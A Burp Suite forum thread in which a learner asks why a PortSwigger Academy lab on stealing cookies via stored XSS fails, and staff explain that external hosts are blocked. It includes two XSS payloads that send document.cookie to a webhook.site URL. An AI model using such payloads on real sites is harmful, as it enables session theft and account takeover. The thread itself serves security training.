Burp Suite User Forum


Academy Lab Practitioner level: Exploiting cross-site scripting to steal cookies

TheWhiteBoot | Last updated: Nov 13, 2022 08:47PM UTC

Hi User forum,

I'm currently trying to solve the "Exploiting cross-site scripting to steal cookies" lab (https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies), and I successfully exploited the comment functionality as the lab description says: "This lab contains a stored XSS vulnerability in the blog comments function." So, to steal the victim's cookie, I'm using the online tool webhook.site. This is my payload:

    <img src=x onerror=this.src='https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4?cookie='+document.cookie;>

But this only sends my own cookie to the webhook website... So I thought maybe it has something to do with HTTP verbs. The img payload creates a GET request, so maybe it needs to be a POST request. I tried that, but again, it only sends my cookie.

So I peeked at the solution and saw that it was using Burp Professional with the Burp Collaborator. But this lab can be solved without Burp Professional, right? I'm using Burp Community because I do not have the money to pay for the Professional version...

I also used the payload from the solution, but I do not get the victim's cookie... This is my payload:

    <script>
    fetch('https://webhook.site/78b1e425-8c1b-4321-9ced-c924a3ebe6f4', {
      method: 'POST',
      mode: 'no-cors',
      body: document.cookie
    });
    </script>

Can anyone tell me what I am doing wrong?

Kind regards,
TheWhiteBoot

Ben, PortSwigger Agent | Last updated: Nov 14, 2022 12:08PM UTC

Hi TheWhiteBoot,

As noted in the solution to the lab, we block interactions between the labs and arbitrary external systems so, if you are attempting to use the method mentioned in the written solution, you would need access to Burp Collaborator.

There is, however, an alternative method (this is also mentioned in the solution) if you do not have access to Burp Collaborator (this involves making the victim post their cookie within a blog comment by exploiting the XSS vulnerability to perform CSRF).

The guide below should help you with the alternative method:

https://foxsroot.medium.com/exploiting-xss-to-steal-cookies-portswigger-web-security-academy-45ae93ec420e
